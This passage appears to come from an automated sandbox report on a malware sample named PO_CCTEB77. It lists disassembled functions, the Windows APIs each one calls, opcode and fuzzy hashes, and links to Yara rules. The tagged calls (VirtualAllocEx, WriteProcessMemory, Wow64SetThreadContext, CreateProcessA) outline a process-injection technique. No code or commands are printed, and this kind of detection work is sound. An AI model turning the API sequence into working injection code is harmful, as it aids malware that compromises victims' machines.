                                                                            Function 0797B39C Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0797B5DE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: 90b11a837f66f10011b75c94ad40da7c56edddc230b4b007ff333191b623121a
                                                                            • Instruction ID: cf6a5aec0eda721dee4390c00ced6d3f47926ba222ebedd21b73cd57b768f32d
                                                                            • Opcode Fuzzy Hash: 90b11a837f66f10011b75c94ad40da7c56edddc230b4b007ff333191b623121a
                                                                            • Instruction Fuzzy Hash: 58A17CB1D0061ADFDF24CF68C841BEDBBB6BF48318F14856AE818A7240DB749985CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0797B3A8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0797B5DE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: 45813fd9ad51231ece658d2abd369ca0fc831ac7bac706d8eab2145252422f4c
                                                                            • Instruction ID: 1014766e0c691f835d23b4886756d008140637f27b5143b2559d56150ae283ec
                                                                            • Opcode Fuzzy Hash: 45813fd9ad51231ece658d2abd369ca0fc831ac7bac706d8eab2145252422f4c
                                                                            • Instruction Fuzzy Hash: 38916BB1D0061ADFDF24CF68C841BEEBBB6BF48318F1485A9D818A7240DB749985CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0315B1F0 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0315B446
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2045356024.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_3150000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 15e5f44668819e828bebedca96d99f76ca5238f443a8bdd83eb0fad68fa5a6c9
                                                                            • Instruction ID: 05aef0f0e3cb0b2669f1b0ad001862cef156140227d9a7aed46fa5ca818f2b17
                                                                            • Opcode Fuzzy Hash: 15e5f44668819e828bebedca96d99f76ca5238f443a8bdd83eb0fad68fa5a6c9
                                                                            • Instruction Fuzzy Hash: 7C714670A04B05CFD724DF6AD14075ABBF5FF48200F048A2EE85AD7A50DB75E845CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07979918 Relevance: 1.6, APIs: 1, Instructions: 146windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0797C9B5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            • Opcode ID: d0382161ec52ecb81173f1249bfa264ba6feabb6bcdc72fc4461243fbbd8c45a
                                                                            • Instruction ID: 15ccb3348249384a41ee58f1e14252549e18bf1b4f86b237747624707c84d4cc
                                                                            • Opcode Fuzzy Hash: d0382161ec52ecb81173f1249bfa264ba6feabb6bcdc72fc4461243fbbd8c45a
                                                                            • Instruction Fuzzy Hash: A851CFB1C083949FDB12DF6DC454BDABFF8EF06314F14449AD454AB252D238A948CBB5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06521CE4 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06521E02
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2047976009.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6520000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: 7a10ed86c18c107af83bc89cfe395cfcb2c470296d10f61427d63a75fdf1048c
                                                                            • Instruction ID: 92d35e4c3ee762a65446f10c1b2fe6b44bed148d9a41cc2c30912d475905843a
                                                                            • Opcode Fuzzy Hash: 7a10ed86c18c107af83bc89cfe395cfcb2c470296d10f61427d63a75fdf1048c
                                                                            • Instruction Fuzzy Hash: 8351C1B5C0021AEFDF14CF99C984ADEBFB6BF49300F64812AE518AB260D7759945CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06520AB8 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06521E02
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2047976009.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6520000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: ebd32c3d9f664f0ea0150dee168082ee6949ed71c913f990827f3539ea56387a
                                                                            • Instruction ID: 36df24f9558157c2c50c10f67e262f05ffdcf1f55f5d7c7984f997f9a116da12
                                                                            • Opcode Fuzzy Hash: ebd32c3d9f664f0ea0150dee168082ee6949ed71c913f990827f3539ea56387a
                                                                            • Instruction Fuzzy Hash: 3B51C1B1D00319DFDB24CF9AC884ADEBFB5BF49310F64812AE918AB250D7759845CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06520C0C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 06524371
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2047976009.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6520000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: CallProcWindow
                                                                            • String ID:
                                                                            • API String ID: 2714655100-0
                                                                            • Opcode ID: 29489a79d197fa38a280d4f80e6bd2bc9c902be9a5f2e2d44b03e87bf01b1ac8
                                                                            • Instruction ID: 5ba6116369aa15144ca2eb38f3260ed0e3123184d13a0886b39eb351029eb516
                                                                            • Opcode Fuzzy Hash: 29489a79d197fa38a280d4f80e6bd2bc9c902be9a5f2e2d44b03e87bf01b1ac8
                                                                            • Instruction Fuzzy Hash: 164129B4900216DFCB54CF99C888AAEBBF5FF99314F248459D519A7361D734A841CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 03156005 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 031560C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2045356024.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_3150000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 9fda1a76bce642708e74f90bf5622e612dfb651c562bbe7ff12f3e3c9eab4419
                                                                            • Instruction ID: aeba9ee94b3d76e7cadd60d3992f4d6b6f8b0667f7cd0bd39514a130aab4b845
                                                                            • Opcode Fuzzy Hash: 9fda1a76bce642708e74f90bf5622e612dfb651c562bbe7ff12f3e3c9eab4419
                                                                            • Instruction Fuzzy Hash: 0E41D1B1C00619CBDB24CFA9C984BDDFBF1BF48304F64806AD418AB255DB756946CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0315481C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 031560C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2045356024.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_3150000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 0a66e796cbcf1b16a7863bc8decaeafd44b1f14403537ab997f4718712232b72
                                                                            • Instruction ID: 1e2dd38448680d2933a58119c1b8619c7abc6182d30b2c079dd50b947722d99d
                                                                            • Opcode Fuzzy Hash: 0a66e796cbcf1b16a7863bc8decaeafd44b1f14403537ab997f4718712232b72
                                                                            • Instruction Fuzzy Hash: 1341E0B0C00619CBDB24DFAAC884B9EFBF5FF48304F64806AD418AB255DB756946CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0797B118 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0797B1B0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 64a4ac578b77561f983158e569c69034a189433915ef10076e9c37e353a512f9
                                                                            • Instruction ID: 882d70ac1f5ef974082e9b1aa82830fbe75085d3a289943a7e4d25143ebf3194
                                                                            • Opcode Fuzzy Hash: 64a4ac578b77561f983158e569c69034a189433915ef10076e9c37e353a512f9
                                                                            • Instruction Fuzzy Hash: 822146B69003499FCB10CFAAC884BEEBBF5FF48314F10842AE519A7240C7789945CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0797B120 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0797B1B0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 04aed9066a6f76095ce33e2627f7c602144e4696dda2d91b60f09f479a0effd7
                                                                            • Instruction ID: 8eb613b314ecd9c038014bb3669691b7cf4e9a2e749fa2c19f7c085abfb2c6d1
                                                                            • Opcode Fuzzy Hash: 04aed9066a6f76095ce33e2627f7c602144e4696dda2d91b60f09f479a0effd7
                                                                            • Instruction Fuzzy Hash: 6A2125B19003599FCB10DFAAC885BEEBBF5FF48314F10842AE919A7240D7789944CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0797B208 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0797B290
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0
                                                                            • Opcode ID: 4848a8ec6aab795375a7341ec6efde8bbcc3a1be09dbcdc20019ec0fe6e51497
                                                                            • Instruction ID: c2cd8b7b1ecddcf9431a16b1df1369059a8d7fa8621d5f85b4ccc528fd666011
                                                                            • Opcode Fuzzy Hash: 4848a8ec6aab795375a7341ec6efde8bbcc3a1be09dbcdc20019ec0fe6e51497
                                                                            • Instruction Fuzzy Hash: 05214AB1C003599FCB10DFAAC881AEEFBF5FF48310F50842AE559A7240C7389944CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0315CD48 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0315D666,?,?,?,?,?), ref: 0315D727
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2045356024.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_3150000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: ef97219423ceb8e0893c6fa957b239d1ee45cabfc2e01dcfa87c1aafb977893b
                                                                            • Instruction ID: 3aad21efa6f450c0fb10e2c86a9bdf2ff03ec8d599d173773c0baaa1644b4954
                                                                            • Opcode Fuzzy Hash: ef97219423ceb8e0893c6fa957b239d1ee45cabfc2e01dcfa87c1aafb977893b
                                                                            • Instruction Fuzzy Hash: 2C21E3B5900248EFDB10DF9AD584AEEFBF8FB48310F14841AE958A7310D378A944CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0315D698 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0315D666,?,?,?,?,?), ref: 0315D727
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2045356024.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_3150000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 8dc92ce1347f0f2b3a1fe8de2c38767d4685308bffeb9cfbd0d2a8947b3f25c5
                                                                            • Instruction ID: 4f963e9cf491600161571ce31f464ac2b893a7793f81f8017c85f65d83efc71e
                                                                            • Opcode Fuzzy Hash: 8dc92ce1347f0f2b3a1fe8de2c38767d4685308bffeb9cfbd0d2a8947b3f25c5
                                                                            • Instruction Fuzzy Hash: BC21E5B5900248DFDB10CF9AD584ADEBBF9EB48314F14841AE954A3350D379A940CFA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0797AF80 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0797B006
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            • Opcode ID: f491a273102d45b3bdea0bb7b01259bb48a296ed00ea4b245a585b21e30a36e0
                                                                            • Instruction ID: 19589de1527b878af555bb7b5a0285086c1b5b052b6ec2e45f77fbfd0127d68c
                                                                            • Opcode Fuzzy Hash: f491a273102d45b3bdea0bb7b01259bb48a296ed00ea4b245a585b21e30a36e0
                                                                            • Instruction Fuzzy Hash: C22135B1D002098FDB14DFAAC485BEEBBF5FF88314F14842AD459A7240CB789945CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0797B210 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0797B290
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0
                                                                            • Opcode ID: 4ff4ba087b4593c6251a95b5f0e1e07a273a72704445f6b46eaff2dfe0b1643a
                                                                            • Instruction ID: 0007e89c075c3ccb92652ae29d8e3a9a3bda48e6c88cd1ec2017f567a3cd2e57
                                                                            • Opcode Fuzzy Hash: 4ff4ba087b4593c6251a95b5f0e1e07a273a72704445f6b46eaff2dfe0b1643a
                                                                            • Instruction Fuzzy Hash: E42139B1C003599FCB10DFAAC885AEEFBF5FF48310F50842AE919A7240D7389940CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0797AF88 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0797B006
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            • Opcode ID: 210d31f31929c5d60da930cf98179077eb199e60d8aef9fb00a8f074d5a5e2d9
                                                                            • Instruction ID: a021a685851aba54f6e49344e25797b04dc86f7df534d36269aeb1c8361aa4ab
                                                                            • Opcode Fuzzy Hash: 210d31f31929c5d60da930cf98179077eb199e60d8aef9fb00a8f074d5a5e2d9
                                                                            • Instruction Fuzzy Hash: CB2135B1D003098FDB14DFAAC485BEEBBF4EF48314F50842AD419A7241CB78A945CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0315AC40 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0315B4C1,00000800,00000000,00000000), ref: 0315B6B2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2045356024.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_3150000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 1c40329de515393d03ce4bf63dbca141783c5562f090a65485e6ea1e91ee4a5e
                                                                            • Instruction ID: b2f016c38ad0ee65be5d7c8bd39c0cd43d50deb0f5f56942362bbe9e78edcea0
                                                                            • Opcode Fuzzy Hash: 1c40329de515393d03ce4bf63dbca141783c5562f090a65485e6ea1e91ee4a5e
                                                                            • Instruction Fuzzy Hash: F61114B6C05248DFCB10DF9AC444AEEFBF4EB48310F14842AE929A7210C379A945CFA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0797B059 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0797B0CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 959b2d3bdbb8ac3a5a0e7927b438cb8ed0c248db54a0b4c4203ed9723adad157
                                                                            • Instruction ID: 261a3d0f962fbc040b059266de6376358855088bcff68d186496882a241b9a26
                                                                            • Opcode Fuzzy Hash: 959b2d3bdbb8ac3a5a0e7927b438cb8ed0c248db54a0b4c4203ed9723adad157
                                                                            • Instruction Fuzzy Hash: 3D1159B18002099FCB20DFAAD844AEEFFF5FF48314F20881AE519A7250CB759944CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0797C952 Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0797C9B5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            • Opcode ID: b206d07bf5f640290d69c76f3660cdb603a45a7aed2eeacf5dbb69bb43353bf9
                                                                            • Instruction ID: 97d712c908a65860852682061daa1ff38680d6459514916c6e8e963ac24a81ef
                                                                            • Opcode Fuzzy Hash: b206d07bf5f640290d69c76f3660cdb603a45a7aed2eeacf5dbb69bb43353bf9
                                                                            • Instruction Fuzzy Hash: F71107B68003499FDB20DF9AD885BDAFFF8EB59324F10841AD558A7600D375A944CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0315B642 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0315B4C1,00000800,00000000,00000000), ref: 0315B6B2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2045356024.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_3150000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: b1b32b9f23ed214cfdef863fcfaf9e5510465ab90e2cebba87a18b2ef39c7ee0
                                                                            • Instruction ID: a33ae251c588d63902359cb408fdd6b17005448cefeeff679314362aff481fcd
                                                                            • Opcode Fuzzy Hash: b1b32b9f23ed214cfdef863fcfaf9e5510465ab90e2cebba87a18b2ef39c7ee0
                                                                            • Instruction Fuzzy Hash: 871114B6C002089FCB14CF9AD584AEEFBF8EB48310F14841AE919A7210C379A545CFA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0797D420 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,0797D2D9,?,?), ref: 0797D480
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: ChangeCloseFindNotification
                                                                            • String ID:
                                                                            • API String ID: 2591292051-0
                                                                            • Opcode ID: dca5117de6b1642cf963d0a8acd2653cece342bc58c5f4782f7a057ff206508b
                                                                            • Instruction ID: 28c5d0ba2f298fc9fc4f49e8eb09d17f68adc75d3ef7d145ffec9486c85071dd
                                                                            • Opcode Fuzzy Hash: dca5117de6b1642cf963d0a8acd2653cece342bc58c5f4782f7a057ff206508b
                                                                            • Instruction Fuzzy Hash: 331158B58003099FCB10DF9AD445BDEBBF4EF48320F10845AD558A3240D738A644CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0797B060 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0797B0CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 0fba7e9335245a139d1bba0f709b1b64830b0d5f6b9c8828b966760c96070232
                                                                            • Instruction ID: af5ab925c3fa57a48ed5c2a5014b983adff3a261ab8997eb4587b104444ab488
                                                                            • Opcode Fuzzy Hash: 0fba7e9335245a139d1bba0f709b1b64830b0d5f6b9c8828b966760c96070232
                                                                            • Instruction Fuzzy Hash: 591107B59002499FCB10DFAAC845AEEFFF5FF48314F14881AE519A7250CB79A944CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 083405A8 Relevance: 1.6, Strings: 1, Instructions: 301COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048736020.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_8340000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (aq
                                                                            • API String ID: 0-600464949
                                                                            • Opcode ID: 42e2b99b569040c4db63c70f462e5e6876682f574b81d2ed46ad81bc7b36001c
                                                                            • Instruction ID: 2dee47dee64839fe883c493dfc1e280fb138bbe784d1fd53cb066a309dcf913c
                                                                            • Opcode Fuzzy Hash: 42e2b99b569040c4db63c70f462e5e6876682f574b81d2ed46ad81bc7b36001c
                                                                            • Instruction Fuzzy Hash: 23910570A01349DFCB18DFA9E8549AEBFF6FF86311F10846AE455A7251CB34A805CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0797C72C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,0797D2D9,?,?), ref: 0797D480
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2048367580.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7970000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: ChangeCloseFindNotification
                                                                            • String ID:
                                                                            • API String ID: 2591292051-0
                                                                            • Opcode ID: 282f7cd6094046f48b20352018dba33093c87055650414dcdcfca23297829ce5
                                                                            • Instruction ID: 4202ba38685b734e661f6331534f0eea58a7960834345ed951e447fb0d9466e3
                                                                            • Opcode Fuzzy Hash: 282f7cd6094046f48b20352018dba33093c87055650414dcdcfca23297829ce5
                                                                            • Instruction Fuzzy Hash: 501125B59003499FCB20DF9AC445BEEBBF4EF48324F10845AD558A7240D778A944CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0315B3E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0315B446
                                                                            Memory Dump Source
